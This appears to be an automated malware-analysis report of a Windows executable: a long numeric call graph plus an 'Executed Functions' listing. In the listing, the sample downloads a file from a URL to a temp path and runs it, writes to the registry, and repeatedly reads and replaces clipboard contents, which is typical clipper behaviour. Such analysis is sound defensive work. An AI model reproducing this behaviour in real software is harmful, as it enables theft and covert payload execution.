64462->64481 64463->64428 64482 426830 64465->64482 64468 410613 64468->64443 64469->64438 64470->64441 64471->64445 64472->64448 64473->64450 64474->64453 64475->64431 64476->64434 64477->64437 64478->64457 64479->64460 64480->64462 64481->64459 64483 410600 GetStartupInfoW 64482->64483 64483->64468 64484 432785 64489 432553 64484->64489 64487 4327ad 64490 43257e 64489->64490 64500 4326c7 64490->64500 64504 43c8ce 170 API calls 2 library calls 64490->64504 64492 432771 64508 42a59d 26 API calls _Deallocate 64492->64508 64494 4326d0 64494->64487 64501 43d01c 64494->64501 64496 432711 64496->64500 64505 43c8ce 170 API calls 2 library calls 64496->64505 64498 432730 64498->64500 64506 43c8ce 170 API calls 2 library calls 64498->64506 64500->64494 64507 42eac9 20 API calls __Wcscoll 64500->64507 64509 43c9f1 64501->64509 64503 43d037 64503->64487 64504->64496 64505->64498 64506->64500 64507->64492 64508->64494 64512 43c9fd CallCatchBlock 64509->64512 64510 43ca0b 64527 42eac9 20 API calls __Wcscoll 64510->64527 64512->64510 64514 43ca44 64512->64514 64513 43ca10 64528 42a59d 26 API calls _Deallocate 64513->64528 64520 43cfcb 64514->64520 64519 43ca1a __fread_nolock 64519->64503 64530 43f941 64520->64530 64523 43ca68 64529 43ca91 LeaveCriticalSection __wsopen_s 64523->64529 64527->64513 64528->64519 64529->64519 64531 43f964 64530->64531 64532 43f94d 64530->64532 64534 43f983 64531->64534 64535 43f96c 64531->64535 64607 42eac9 20 API calls __Wcscoll 64532->64607 64611 434faa 10 API calls 2 library calls 64534->64611 64609 42eac9 20 API calls __Wcscoll 64535->64609 64538 43f952 64608 42a59d 26 API calls _Deallocate 64538->64608 64539 43f971 64610 42a59d 26 API calls _Deallocate 64539->64610 64540 43f98a MultiByteToWideChar 64543 43f9b9 64540->64543 64544 43f9a9 GetLastError 64540->64544 64613 4336a7 21 API calls 3 library calls 64543->64613 64612 42ea93 20 API calls 2 library calls 64544->64612 64547 43cfe1 64547->64523 64554 43d03c 64547->64554 64548 43f9c1 64549 43f9e9 64548->64549 64550 43f9c8 MultiByteToWideChar 64548->64550 64551 43346a _free 20 API calls 64549->64551 64550->64549 64552 43f9dd GetLastError 64550->64552 64551->64547 64614 42ea93 20 API calls 2 library calls 64552->64614 64615 43cd9f 64554->64615 64557 43d087 64633 43977e 64557->64633 64558 43d06e 64647 42eab6 20 API calls __Wcscoll 64558->64647 64561 43d08c 64563 43d095 64561->64563 64564 43d0ac 64561->64564 64562 43d073 64648 42eac9 20 API calls __Wcscoll 64562->64648 64649 42eab6 20 API calls __Wcscoll 64563->64649 64646 43cd0a CreateFileW 64564->64646 64568 43d09a 64650 42eac9 20 API calls __Wcscoll 64568->64650 64570 43d162 GetFileType 64571 43d1b4 64570->64571 64572 43d16d GetLastError 64570->64572 64655 4396c7 21 API calls 3 library calls 64571->64655 64653 42ea93 20 API calls 2 library calls 64572->64653 64573 43d137 GetLastError 64652 42ea93 20 API calls 2 library calls 64573->64652 64576 43d0e5 64576->64570 64576->64573 64651 43cd0a CreateFileW 64576->64651 64577 43d17b CloseHandle 64577->64562 64579 43d1a4 64577->64579 64654 42eac9 20 API calls __Wcscoll 64579->64654 64581 43d12a 64581->64570 64581->64573 64583 43d1d5 64584 43d221 64583->64584 64656 43cf1b 169 API calls 4 library calls 64583->64656 64589 43d24e 64584->64589 64657 43cabd 167 API calls 4 library calls 64584->64657 64585 43d1a9 64585->64562 64588 43d247 64588->64589 64590 43d25f 64588->64590 64658 4335cd 29 API calls 2 library calls 64589->64658 64592 43d009 64590->64592 64593 43d2dd CloseHandle 64590->64593 64601 43346a 64592->64601 64659 43cd0a CreateFileW 64593->64659 64595 43d308 64596 43d312 GetLastError 64595->64596 64597 43d257 64595->64597 64660 42ea93 20 API calls 2 library calls 64596->64660 64597->64592 64599 43d31e 64661 439890 21 API calls 3 library calls 64599->64661 64602 433475 HeapFree 64601->64602 64606 43349e __dosmaperr 64601->64606 64603 43348a 64602->64603 64602->64606 64684 42eac9 20 API calls __Wcscoll 64603->64684 64605 433490 GetLastError 64605->64606 64606->64523 64607->64538 64608->64547 64609->64539 64610->64547 64611->64540 64612->64547 64613->64548 64614->64549 64616 43cdc0 64615->64616 64617 43cdda 64615->64617 64616->64617 64669 42eac9 20 API calls __Wcscoll 64616->64669 64662 43cd2f 64617->64662 64620 43cdcf 64670 42a59d 26 API calls _Deallocate 64620->64670 64622 43ce12 64623 43ce41 64622->64623 64671 42eac9 20 API calls __Wcscoll 64622->64671 64630 43ce94 64623->64630 64673 42ffdf 26 API calls 2 library calls 64623->64673 64626 43ce8f 64628 43cf0e 64626->64628 64626->64630 64627 43ce36 64672 42a59d 26 API calls _Deallocate 64627->64672 64674 42a5ca 11 API calls _Atexit 64628->64674 64630->64557 64630->64558 64632 43cf1a 64634 43978a CallCatchBlock 64633->64634 64677 42e3ed EnterCriticalSection 64634->64677 64636 4397d8 64678 439887 64636->64678 64637 4397b6 64681 43955d 21 API calls 3 library calls 64637->64681 64638 439791 64638->64636 64638->64637 64643 439824 EnterCriticalSection 64638->64643 64641 439801 __fread_nolock 64641->64561 64642 4397bb 64642->64636 64682 4396a4 EnterCriticalSection 64642->64682 64643->64636 64644 439831 LeaveCriticalSection 64643->64644 64644->64638 64646->64576 64647->64562 64648->64592 64649->64568 64650->64562 64651->64581 64652->64562 64653->64577 64654->64585 64655->64583 64656->64584 64657->64588 64658->64597 64659->64595 64660->64599 64661->64597 64663 43cd47 64662->64663 64664 43cd62 64663->64664 64675 42eac9 20 API calls __Wcscoll 64663->64675 64664->64622 64666 43cd86 64676 42a59d 26 API calls _Deallocate 64666->64676 64668 43cd91 64668->64622 64669->64620 64670->64617 64671->64627 64672->64623 64673->64626 64674->64632 64675->64666 64676->64668 64677->64638 64683 42e435 LeaveCriticalSection 64678->64683 64680 43988e 64680->64641 64681->64642 64682->64636 64683->64680 64684->64605 64685 b09a08 64686 b09a5c 64685->64686 64687 b09b4c 64686->64687 64690 b09b2e 64686->64690 64691 b09b3d 64690->64691 64694 b0a2ce 64691->64694 64699 b0a2e9 64694->64699 64695 b0a2f2 CreateToolhelp32Snapshot 64696 b0a30e Module32First 64695->64696 64695->64699 64697 b0a31d 64696->64697 64700 b09b2d 64696->64700 64701 b09f8d 64697->64701 64699->64695 64699->64696 64702 b09fb8 64701->64702 64703 b0a001 64702->64703 64704 b09fc9 VirtualAlloc 64702->64704 64703->64703 64704->64703 64705 43410a 64706 434116 CallCatchBlock 64705->64706 64707 434122 64706->64707 64708 434139 64706->64708 64739 42eac9 20 API calls __Wcscoll 64707->64739 64718 42caff EnterCriticalSection 64708->64718 64711 434127 64740 42a59d 26 API calls _Deallocate 64711->64740 64712 434149 64719 434186 64712->64719 64715 434155 64741 43417c LeaveCriticalSection __fread_nolock 64715->64741 64717 434132 __fread_nolock 64718->64712 64720 434194 64719->64720 64721 4341ae 64719->64721 64752 42eac9 20 API calls __Wcscoll 64720->64752 64742 432908 64721->64742 64724 434199 64753 42a59d 26 API calls _Deallocate 64724->64753 64725 4341b7 64749 4347d3 64725->64749 64727 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64727->64715 64730 4342bb 64732 4342c8 64730->64732 64736 43426e 64730->64736 64731 43423f 64734 43425c 64731->64734 64731->64736 64755 42eac9 20 API calls __Wcscoll 64732->64755 64754 43449f 31 API calls 4 library calls 64734->64754 64736->64727 64756 43431b 30 API calls 2 library calls 64736->64756 64737 434266 64737->64727 64739->64711 64740->64717 64741->64717 64743 432914 64742->64743 64744 432929 64742->64744 64757 42eac9 20 API calls __Wcscoll 64743->64757 64744->64725 64746 432919 64758 42a59d 26 API calls _Deallocate 64746->64758 64748 432924 64748->64725 64759 434650 64749->64759 64751 4341d3 64751->64727 64751->64730 64751->64731 64752->64724 64753->64727 64754->64737 64755->64727 64756->64727 64757->64746 64758->64748 64760 43465c CallCatchBlock 64759->64760 64761 434664 64760->64761 64762 43467c 64760->64762 64794 42eab6 20 API calls __Wcscoll 64761->64794 64764 434730 64762->64764 64769 4346b4 64762->64769 64799 42eab6 20 API calls __Wcscoll 64764->64799 64765 434669 64795 42eac9 20 API calls __Wcscoll 64765->64795 64768 434735 64800 42eac9 20 API calls __Wcscoll 64768->64800 64784 4396a4 EnterCriticalSection 64769->64784 64772 43473d 64801 42a59d 26 API calls _Deallocate 64772->64801 64773 4346ba 64775 4346f3 64773->64775 64776 4346de 64773->64776 64785 434755 64775->64785 64796 42eac9 20 API calls __Wcscoll 64776->64796 64777 434671 __fread_nolock 64777->64751 64780 4346e3 64797 42eab6 20 API calls __Wcscoll 64780->64797 64781 4346ee 64798 434728 LeaveCriticalSection __wsopen_s 64781->64798 64784->64773 64802 439921 64785->64802 64787 434767 64788 434780 SetFilePointerEx 64787->64788 64789 43476f 64787->64789 64791 434774 64788->64791 64792 434798 GetLastError 64788->64792 64815 42eac9 20 API calls __Wcscoll 64789->64815 64791->64781 64816 42ea93 20 API calls 2 library calls 64792->64816 64794->64765 64795->64777 64796->64780 64797->64781 64798->64777 64799->64768 64800->64772 64801->64777 64803 439943 64802->64803 64804 43992e 64802->64804 64808 439968 64803->64808 64819 42eab6 20 API calls __Wcscoll 64803->64819 64817 42eab6 20 API calls __Wcscoll 64804->64817 64807 439933 64818 42eac9 20 API calls __Wcscoll 64807->64818 64808->64787 64809 439973 64820 42eac9 20 API calls __Wcscoll 64809->64820 64812 43993b 64812->64787 64813 43997b 64821 42a59d 26 API calls _Deallocate 64813->64821 64815->64791 64816->64791 64817->64807 64818->64812 64819->64809 64820->64813 64821->64812 64822 4332de 64823 4332eb 64822->64823 64826 433303 64822->64826 64872 42eac9 20 API calls __Wcscoll 64823->64872 64825 4332f0 64873 42a59d 26 API calls _Deallocate 64825->64873 64828 43335e 64826->64828 64836 4332fb 64826->64836 64874 434ccd 21 API calls 2 library calls 64826->64874 64830 432908 __fread_nolock 26 API calls 64828->64830 64831 433376 64830->64831 64842 432e16 64831->64842 64833 43337d 64834 432908 __fread_nolock 26 API calls 64833->64834 64833->64836 64835 4333a9 64834->64835 64835->64836 64837 432908 __fread_nolock 26 API calls 64835->64837 64838 4333b7 64837->64838 64838->64836 64839 432908 __fread_nolock 26 API calls 64838->64839 64840 4333c7 64839->64840 64841 432908 __fread_nolock 26 API calls 64840->64841 64841->64836 64843 432e22 CallCatchBlock 64842->64843 64844 432e42 64843->64844 64845 432e2a 64843->64845 64846 432f08 64844->64846 64850 432e7b 64844->64850 64941 42eab6 20 API calls __Wcscoll 64845->64941 64948 42eab6 20 API calls __Wcscoll 64846->64948 64849 432e2f 64942 42eac9 20 API calls __Wcscoll 64849->64942 64853 432e8a 64850->64853 64854 432e9f 64850->64854 64851 432f0d 64949 42eac9 20 API calls __Wcscoll 64851->64949 64943 42eab6 20 API calls __Wcscoll 64853->64943 64875 4396a4 EnterCriticalSection 64854->64875 64858 432e97 64950 42a59d 26 API calls _Deallocate 64858->64950 64859 432e8f 64944 42eac9 20 API calls __Wcscoll 64859->64944 64860 432ea5 64863 432ec1 64860->64863 64864 432ed6 64860->64864 64861 432e37 __fread_nolock 64861->64833 64945 42eac9 20 API calls __Wcscoll 64863->64945 64876 432f29 64864->64876 64868 432ed1 64947 432f00 LeaveCriticalSection __wsopen_s 64868->64947 64869 432ec6 64946 42eab6 20 API calls __Wcscoll 64869->64946 64872->64825 64873->64836 64874->64828 64875->64860 64877 432f53 64876->64877 64878 432f3b 64876->64878 64880 4332bd 64877->64880 64883 432f98 64877->64883 64960 42eab6 20 API calls __Wcscoll 64878->64960 64978 42eab6 20 API calls __Wcscoll 64880->64978 64881 432f40 64961 42eac9 20 API calls __Wcscoll 64881->64961 64886 432fa3 64883->64886 64887 432f48 64883->64887 64894 432fd3 64883->64894 64885 4332c2 64979 42eac9 20 API calls __Wcscoll 64885->64979 64962 42eab6 20 API calls __Wcscoll 64886->64962 64887->64868 64890 432fb0 64980 42a59d 26 API calls _Deallocate 64890->64980 64891 432fa8 64963 42eac9 20 API calls __Wcscoll 64891->64963 64895 432fec 64894->64895 64896 433012 64894->64896 64897 43302e 64894->64897 64895->64896 64930 432ff9 64895->64930 64964 42eab6 20 API calls __Wcscoll 64896->64964 64967 4336a7 21 API calls 3 library calls 64897->64967 64899 433017 64965 42eac9 20 API calls __Wcscoll 64899->64965 64903 433045 64905 43346a _free 20 API calls 64903->64905 64904 43301e 64966 42a59d 26 API calls _Deallocate 64904->64966 64909 43304e 64905->64909 64907 43320d 64910 433211 ReadFile 64907->64910 64908 433197 64908->64907 64911 4331b0 GetConsoleMode 64908->64911 64912 43346a _free 20 API calls 64909->64912 64913 433285 GetLastError 64910->64913 64914 43322b 64910->64914 64911->64907 64915 4331c1 64911->64915 64916 433055 64912->64916 64917 433292 64913->64917 64918 4331e9 64913->64918 64914->64913 64919 433202 64914->64919 64915->64910 64920 4331c7 ReadConsoleW 64915->64920 64921 43307a 64916->64921 64922 43305f 64916->64922 64976 42eac9 20 API calls __Wcscoll 64917->64976 64938 433029 __fread_nolock 64918->64938 64973 42ea93 20 API calls 2 library calls 64918->64973 64934 433250 64919->64934 64935 433267 64919->64935 64919->64938 64920->64919 64925 4331e3 GetLastError 64920->64925 64970 4347ee 64921->64970 64968 42eac9 20 API calls __Wcscoll 64922->64968 64925->64918 64926 43346a _free 20 API calls 64926->64887 64928 433064 64969 42eab6 20 API calls __Wcscoll 64928->64969 64929 433297 64977 42eab6 20 API calls __Wcscoll 64929->64977 64951 43d365 64930->64951 64974 432c45 31 API calls 3 library calls 64934->64974 64937 43327e 64935->64937 64935->64938 64975 432a85 29 API calls __fread_nolock 64937->64975 64938->64926 64940 433283 64940->64938 64941->64849 64942->64861 64943->64859 64944->64858 64945->64869 64946->64868 64947->64861 64948->64851 64949->64858 64950->64861 64952 43d372 64951->64952 64953 43d37f 64951->64953 64981 42eac9 20 API calls __Wcscoll 64952->64981 64955 43d38b 64953->64955 64982 42eac9 20 API calls __Wcscoll 64953->64982 64955->64908 64957 43d377 64957->64908 64958 43d3ac 64983 42a59d 26 API calls _Deallocate 64958->64983 64960->64881 64961->64887 64962->64891 64963->64890 64964->64899 64965->64904 64966->64938 64967->64903 64968->64928 64969->64938 64971 434755 __fread_nolock 28 API calls 64970->64971 64972 434804 64971->64972 64972->64930 64973->64938 64974->64938 64975->64940 64976->64929 64977->64938 64978->64885 64979->64890 64980->64887 64981->64957 64982->64958 64983->64957 64984 402bad RegCreateKeyExW 64985 402bdb RegSetValueExW 64984->64985 64986 402bef 64984->64986 64985->64986 64987 402bf4 RegCloseKey 64986->64987 64988 402bfd 64986->64988 64987->64988 64989 404b8e 64990 404b9a Concurrency::details::FairScheduleGroup::AllocateSegment 64989->64990 64995 40fb0c 64990->64995 64994 404bba ~ListArray Concurrency::details::FairScheduleGroup::AllocateSegment 64997 40fb11 64995->64997 64998 404ba3 64997->64998 65000 40fb2d Concurrency::details::FairScheduleGroup::AllocateSegment 64997->65000 65019 42ad7e 64997->65019 65026 42f450 7 API calls 2 library calls 64997->65026 65003 4051d0 64998->65003 65027 42860d RaiseException 65000->65027 65002 4103cc 65004 4051dc __Cnd_init Concurrency::details::FairScheduleGroup::AllocateSegment 65003->65004 65006 4051f4 __Mtx_init 65004->65006 65038 40ce32 28 API calls std::_Throw_Cpp_error 65004->65038 65007 40521b 65006->65007 65039 40ce32 28 API calls std::_Throw_Cpp_error 65006->65039 65030 4010ea 65007->65030 65013 40526a 65015 40527f ~ListArray 65013->65015 65041 401128 30 API calls 2 library calls 65013->65041 65042 401109 65015->65042 65018 4052a4 Concurrency::details::FairScheduleGroup::AllocateSegment 65018->64994 65021 4336a7 std::_Locinfo::_Locinfo_ctor 65019->65021 65020 4336e5 65029 42eac9 20 API calls __Wcscoll 65020->65029 65021->65020 65023 4336d0 RtlAllocateHeap 65021->65023 65028 42f450 7 API calls 2 library calls 65021->65028 65023->65021 65024 4336e3 65023->65024 65024->64997 65026->64997 65027->65002 65028->65021 65029->65024 65046 40d313 65030->65046 65033 401103 65035 40cef3 65033->65035 65070 42e114 65035->65070 65038->65006 65039->65007 65040 40ce32 28 API calls std::_Throw_Cpp_error 65040->65013 65041->65013 65043 401115 __Mtx_unlock 65042->65043 65044 401122 65043->65044 65395 40ce32 28 API calls std::_Throw_Cpp_error 65043->65395 65044->65018 65050 40d06d 65046->65050 65049 40ce32 28 API calls std::_Throw_Cpp_error 65049->65033 65051 40d0c3 65050->65051 65052 40d095 GetCurrentThreadId 65050->65052 65053 40d0c7 GetCurrentThreadId 65051->65053 65054 40d0ed 65051->65054 65055 40d0a0 GetCurrentThreadId 65052->65055 65065 40d0bb 65052->65065 65057 40d0d6 65053->65057 65056 40d186 GetCurrentThreadId 65054->65056 65060 40d10d 65054->65060 65055->65065 65056->65057 65058 40d1dd GetCurrentThreadId 65057->65058 65057->65065 65058->65065 65059 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65061 4010f6 65059->65061 65068 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65060->65068 65061->65033 65061->65049 65064 40d145 GetCurrentThreadId 65064->65057 65066 40d118 __Xtime_diff_to_millis2 65064->65066 65065->65059 65066->65057 65066->65064 65066->65065 65069 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65066->65069 65068->65066 65069->65066 65071 42e121 65070->65071 65072 42e135 65070->65072 65093 42eac9 20 API calls __Wcscoll 65071->65093 65084 42e0cb 65072->65084 65075 42e126 65094 42a59d 26 API calls _Deallocate 65075->65094 65078 42e14a CreateThread 65079 42e175 65078->65079 65080 42e169 GetLastError 65078->65080 65115 42dfc0 65078->65115 65096 42e03d 65079->65096 65095 42ea93 20 API calls 2 library calls 65080->65095 65081 405257 65081->65013 65081->65040 65104 434d2a 65084->65104 65087 43346a _free 20 API calls 65088 42e0e4 65087->65088 65089 42e103 65088->65089 65090 42e0eb GetModuleHandleExW 65088->65090 65091 42e03d __Thrd_start 22 API calls 65089->65091 65090->65089 65092 42e10d 65091->65092 65092->65078 65092->65079 65093->65075 65094->65081 65095->65079 65097 42e04a 65096->65097 65103 42e06e 65096->65103 65098 42e050 CloseHandle 65097->65098 65099 42e059 65097->65099 65098->65099 65100 42e068 65099->65100 65101 42e05f FreeLibrary 65099->65101 65102 43346a _free 20 API calls 65100->65102 65101->65100 65102->65103 65103->65081 65105 434d37 65104->65105 65106 434d77 65105->65106 65107 434d62 HeapAlloc 65105->65107 65112 434d4b std::_Locinfo::_Locinfo_ctor 65105->65112 65114 42eac9 20 API calls __Wcscoll 65106->65114 65108 434d75 65107->65108 65107->65112 65110 42e0db 65108->65110 65110->65087 65112->65106 65112->65107 65113 42f450 7 API calls 2 library calls 65112->65113 65113->65112 65114->65110 65116 42dfcc _Atexit 65115->65116 65117 42dfd3 GetLastError ExitThread 65116->65117 65118 42dfe0 65116->65118 65131 431eda GetLastError 65118->65131 65120 42dfe5 65151 435571 65120->65151 65124 42dffb 65158 401169 65124->65158 65132 431ef0 65131->65132 65133 431ef6 65131->65133 65166 435111 11 API calls 2 library calls 65132->65166 65135 434d2a __Wcscoll 20 API calls 65133->65135 65137 431f45 SetLastError 65133->65137 65136 431f08 65135->65136 65138 431f10 65136->65138 65167 435167 11 API calls 2 library calls 65136->65167 65137->65120 65140 43346a _free 20 API calls 65138->65140 65142 431f16 65140->65142 65141 431f25 65141->65138 65143 431f2c 65141->65143 65145 431f51 SetLastError 65142->65145 65168 431d4c 20 API calls __Wcscoll 65143->65168 65169 42df7d 167 API calls 2 library calls 65145->65169 65146 431f37 65148 43346a _free 20 API calls 65146->65148 65150 431f3e 65148->65150 65149 431f5d 65150->65137 65150->65145 65152 435596 65151->65152 65153 43558c 65151->65153 65170 434e93 5 API calls 2 library calls 65152->65170 65155 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65153->65155 65156 42dff0 65155->65156 65156->65124 65165 4354a4 10 API calls 2 library calls 65156->65165 65157 4355ad 65157->65153 65171 405800 65158->65171 65184 40155a Sleep 65158->65184 65159 401173 65162 42e199 65159->65162 65363 42e074 65162->65363 65164 42e1a6 65165->65124 65166->65133 65167->65141 65168->65146 65169->65149 65170->65157 65172 40580c Concurrency::details::FairScheduleGroup::AllocateSegment 65171->65172 65173 4010ea std::_Cnd_initX 35 API calls 65172->65173 65174 405821 __Cnd_signal 65173->65174 65175 405839 65174->65175 65230 40ce32 28 API calls std::_Throw_Cpp_error 65174->65230 65177 401109 std::_Cnd_initX 28 API calls 65175->65177 65178 405842 65177->65178 65186 4029f4 InternetOpenW 65178->65186 65202 4016df 65178->65202 65181 405849 ~ListArray Concurrency::details::FairScheduleGroup::AllocateSegment 65181->65159 65185 4016d5 65184->65185 65187 402a27 InternetOpenUrlW 65186->65187 65188 402b9c 65186->65188 65187->65188 65189 402a3d GetTempPathW GetTempFileNameW 65187->65189 65190 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65188->65190 65231 42a88e 65189->65231 65193 402bab 65190->65193 65223 40e76b 65193->65223 65194 402b8b InternetCloseHandle InternetCloseHandle 65194->65188 65195 402aa8 Concurrency::details::ResourceManager::DetermineTopology 65196 402ac0 InternetReadFile WriteFile 65195->65196 65197 402b00 CloseHandle 65195->65197 65196->65195 65233 402960 65197->65233 65200 402b2b ShellExecuteExW 65200->65194 65201 402b72 WaitForSingleObject CloseHandle 65200->65201 65201->65194 65341 40fde6 65202->65341 65204 4016eb Sleep 65342 40cc10 65204->65342 65207 40cc10 28 API calls 65208 401711 65207->65208 65209 40171b OpenClipboard 65208->65209 65210 401943 Sleep 65209->65210 65211 40172b GetClipboardData 65209->65211 65210->65209 65212 40173b GlobalLock 65211->65212 65213 40193d CloseClipboard 65211->65213 65212->65213 65217 401748 _strlen 65212->65217 65213->65210 65214 40cbc7 28 API calls std::system_error::system_error 65214->65217 65215 40cc10 28 API calls 65215->65217 65217->65213 65217->65214 65217->65215 65218 4018d2 EmptyClipboard GlobalAlloc 65217->65218 65346 402e66 167 API calls 2 library calls 65217->65346 65348 40caa6 26 API calls _Deallocate 65217->65348 65218->65217 65220 4018eb GlobalLock 65218->65220 65347 426990 65220->65347 65222 401905 GlobalUnlock SetClipboardData GlobalFree 65222->65217 65354 40deea 65223->65354 65228 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65361 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65228->65361 65229 40e810 65229->65181 65230->65175 65232 402a76 CreateFileW 65231->65232 65232->65194 65232->65195 65234 40298b _wcslen Concurrency::details::ResourceManager::DetermineTopology 65233->65234 65243 42b454 65234->65243 65238 4029b8 65265 404333 65238->65265 65241 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65242 4029f2 65241->65242 65242->65194 65242->65200 65269 42b106 65243->65269 65246 402823 65247 402832 Concurrency::details::FairScheduleGroup::AllocateSegment 65246->65247 65295 4032dd 65247->65295 65249 402846 65311 403b8b 65249->65311 65251 40285a 65252 402888 65251->65252 65253 40286c 65251->65253 65317 403112 65252->65317 65338 40329a 167 API calls 65253->65338 65256 402895 65320 403c20 65256->65320 65258 4028a7 65330 403cc2 65258->65330 65260 40287f std::ios_base::_Ios_base_dtor Concurrency::details::FairScheduleGroup::AllocateSegment 65260->65238 65261 4028c4 65262 404333 26 API calls 65261->65262 65263 4028e3 65262->65263 65339 40329a 167 API calls 65263->65339 65266 4029e4 65265->65266 65267 40433b 65265->65267 65266->65241 65340 40cc96 26 API calls 2 library calls 65267->65340 65270 42b133 65269->65270 65271 42b142 65270->65271 65272 42b15a 65270->65272 65283 42b137 65270->65283 65273 42eac9 __Wcscoll 20 API calls 65271->65273 65274 42a747 __fassign 162 API calls 65272->65274 65275 42b147 65273->65275 65277 42b165 65274->65277 65278 42a59d __Thrd_start 26 API calls 65275->65278 65276 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65279 4029a4 65276->65279 65280 42b170 65277->65280 65281 42b307 65277->65281 65278->65283 65279->65246 65285 42b218 WideCharToMultiByte 65280->65285 65288 42b17b 65280->65288 65291 42b1b5 WideCharToMultiByte 65280->65291 65282 42b334 WideCharToMultiByte 65281->65282 65284 42b312 65281->65284 65282->65284 65283->65276 65284->65283 65287 42eac9 __Wcscoll 20 API calls 65284->65287 65285->65288 65289 42b243 65285->65289 65287->65283 65288->65283 65292 42eac9 __Wcscoll 20 API calls 65288->65292 65289->65288 65290 42b24c GetLastError 65289->65290 65290->65288 65294 42b25b 65290->65294 65291->65288 65292->65283 65293 42b274 WideCharToMultiByte 65293->65284 65293->65294 65294->65283 65294->65284 65294->65293 65296 4032e9 Concurrency::details::FairScheduleGroup::AllocateSegment 65295->65296 65297 40467c 167 API calls 65296->65297 65298 403315 65297->65298 65299 40484d 167 API calls 65298->65299 65300 40333e 65299->65300 65301 40458c 26 API calls 65300->65301 65302 40334d 65301->65302 65303 40dde3 167 API calls 65302->65303 65304 403392 std::ios_base::_Ios_base_dtor 65302->65304 65306 403362 65303->65306 65305 4033ce Concurrency::details::FairScheduleGroup::AllocateSegment 65304->65305 65307 40c618 167 API calls 65304->65307 65305->65249 65306->65304 65308 40458c 26 API calls 65306->65308 65307->65305 65309 403373 65308->65309 65310 404c14 167 API calls 65309->65310 65310->65304 65312 403b97 Concurrency::details::FairScheduleGroup::AllocateSegment 65311->65312 65313 4042af 167 API calls 65312->65313 65314 403ba3 65313->65314 65315 403bc7 Concurrency::details::FairScheduleGroup::AllocateSegment 65314->65315 65316 4034fb 167 API calls 65314->65316 65315->65251 65316->65315 65318 404356 28 API calls 65317->65318 65319 40312c Concurrency::details::ResourceManager::DetermineTopology 65318->65319 65319->65256 65321 403c2c Concurrency::details::FairScheduleGroup::AllocateSegment 65320->65321 65322 40c618 167 API calls 65321->65322 65323 403c4f 65322->65323 65324 4042af 167 API calls 65323->65324 65325 403c59 65324->65325 65327 403c9c Concurrency::details::FairScheduleGroup::AllocateSegment 65325->65327 65329 4034fb 167 API calls 65325->65329 65326 403c7a 65326->65327 65328 4046ca 167 API calls 65326->65328 65327->65258 65328->65327 65329->65326 65331 403cce __EH_prolog3_catch 65330->65331 65332 4042af 167 API calls 65331->65332 65334 403ce7 65332->65334 65333 4046ca 167 API calls 65336 403d70 Concurrency::details::FairScheduleGroup::AllocateSegment 65333->65336 65335 403d17 65334->65335 65337 40369f 40 API calls 65334->65337 65335->65333 65336->65261 65337->65335 65338->65260 65339->65260 65340->65266 65341->65204 65343 40cc2c _strlen 65342->65343 65349 40cbc7 65343->65349 65345 401704 65345->65207 65346->65217 65347->65222 65348->65217 65350 40cbfa 65349->65350 65351 40cbd6 BuildCatchObjectHelperInternal 65349->65351 65350->65351 65353 40cb5c 28 API calls 4 library calls 65350->65353 65351->65345 65353->65351 65362 40f22a EnterCriticalSection 65354->65362 65356 40def4 65357 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65356->65357 65358 40ced2 65357->65358 65359 40cec7 CloseHandle 65357->65359 65360 40ced6 GetCurrentThreadId 65358->65360 65359->65360 65360->65228 65361->65229 65362->65356 65372 431f5e GetLastError 65363->65372 65365 42e083 ExitThread 65366 42e0a1 65369 42e0ad CloseHandle 65366->65369 65370 42e0b4 65366->65370 65369->65370 65370->65365 65371 42e0c0 FreeLibraryAndExitThread 65370->65371 65373 431f7d 65372->65373 65374 431f77 65372->65374 65376 434d2a __Wcscoll 17 API calls 65373->65376 65377 431fd4 SetLastError 65373->65377 65392 435111 11 API calls 2 library calls 65374->65392 65378 431f8f 65376->65378 65380 42e07f 65377->65380 65379 431f97 65378->65379 65393 435167 11 API calls 2 library calls 65378->65393 65382 43346a _free 17 API calls 65379->65382 65380->65365 65380->65366 65391 4354f6 10 API calls 2 library calls 65380->65391 65384 431f9d 65382->65384 65383 431fac 65383->65379 65385 431fb3 65383->65385 65387 431fcb SetLastError 65384->65387 65394 431d4c 20 API calls __Wcscoll 65385->65394 65387->65380 65388 431fbe 65389 43346a _free 17 API calls 65388->65389 65390 431fc4 65389->65390 65390->65377 65390->65387 65391->65366 65392->65373 65393->65383 65394->65388 65395->65044 65396 40239e 65397 402561 PostQuitMessage 65396->65397 65398 4023b2 65396->65398 65399 40255f 65397->65399 65400 4023b9 DefWindowProcW 65398->65400 65401 4023d0 65398->65401 65400->65399 65401->65399 65402 4029f4 167 API calls 65401->65402 65402->65399

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                              • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004018FD
